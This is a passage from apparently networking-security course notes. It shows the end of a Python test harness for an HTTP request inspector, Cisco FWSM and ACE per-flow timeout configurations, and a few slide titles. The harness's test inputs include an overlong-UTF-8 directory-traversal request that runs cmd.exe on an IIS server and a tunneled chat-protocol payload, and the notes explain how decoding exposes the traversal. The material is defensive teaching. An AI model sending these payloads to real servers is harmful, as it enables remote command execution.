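TRAVERSAL = (b"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n"
             b"Host: www.example.com\r\n\r\n")
TUNNEL = b"POST /chat HTTP/1.1\r\nHost: www.example.com\r\n\r\nYMSG\x00\x0b\x00\x00"

if __name__ == "__main__":
    for name, req in [("GOOD", GOOD), ("POST", POST), ("TRAVERSAL", TRAVERSAL), ("TUNNEL", TUNNEL)]:
        print(f"{name:10s} {inspect_request(req) or 'pass'}")
```

  The order inside canonical_url is the point of the de-obfuscation bullet: a plain regex for ".." on the wire form of the slide 5 URL matches nothing, because the attacker's "/" is spelled %c0%af; only after decoding, and after mapping the illegal overlong sequence to the byte it stands for, does the traversal become visible to the same regex.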

  47. Timeouts per Flow
  FWSM 3.1:
    class-map TN3270-class
     match port tcp eq 23
    policy-map TN3270-policy
     class TN3270-class
      set connection timeout embryonic 0:00:30 half-closed 0:10:00 tcp 24:00:00
    service-policy TN3270-policy interface inside
  ACE:
    parameter-map type connection TN3270
     set timeout inactivity 86400
    class-map match-all TN3270-class
     2 match port tcp eq telnet
    policy-map multi-match TN370-policy
     class TN3270-class
      connection advanced-options TN3270
    interface vlan 307
     service-policy input TN370-policy

  48. Private VLANs with Service Modules

  49. Role-Based Access with ACE

  50. Customizing Roles and Domains with ACE
